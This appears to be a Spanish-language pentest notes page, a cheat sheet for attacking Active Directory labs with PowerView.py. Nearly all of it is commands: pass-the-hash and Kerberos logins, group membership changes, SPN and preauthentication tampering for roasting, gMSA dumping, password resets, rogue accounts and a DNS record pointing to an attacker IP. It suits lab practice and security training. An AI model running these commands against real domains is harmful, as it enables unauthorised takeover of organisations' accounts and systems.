PowerView.py
Introduction
Installation
Use


Attacking AD using PowerView.py
Última actualización
¿Te fue útil?


Última actualización
¿Te fue útil?
¿Te fue útil?
sudo apt install libkrb5-dev
pip3 install powerview --break-system-packagespowerview dominio.htb/user:'password'@10.10.10.10 --dc-ip 10.10.10.10powerview dominio.htb/user@10.10.10.10 -H '01e97f85894e06a5ad698f624b9a7ee9' --dc-ip 10.10.10.10powerview dominio.htb/user@dc.dominio.htb --dc-ip 10.10.10.10 -ns dc.dominio.htb -k --no-passpowerview dominio.htb/'user':'password'@10.10.10.10 --web --web-host 127.0.0.1 --web-port 3000Add-DomainGroupMember -Identity 'GROUP_TARGET' -Members 'USER_TARGET'Set-DomainObject -Identity "TARGET" -Set 'servicePrincipalname=cifs/gzzcoo'Set-DomainObject -Identity 'TARGET' -Set 'userAccountControl=66048'Set-DomainObject -Identity 'TARGET' -Set 'userAccountControl=4260352'Get-GMSAInvoke-KerberoastSet-DomainUserPassword -Identity 'user_target' -AccountPassword 'Password01!'Set-DomainObjectOwner -TargetIdentity 'object_target' -PrincipalIdentity 'user_target'Add-ADComputer -ComputerName 'Gzzcoo' -ComputerPass 'Password01!'Add-ADUser -UserName 'Gzzcoo' -UserPass 'Password01!'Add-DomainDNSRecord -RecordName '<dns_record_target>' -RecordAddress <ATTACKER_IP>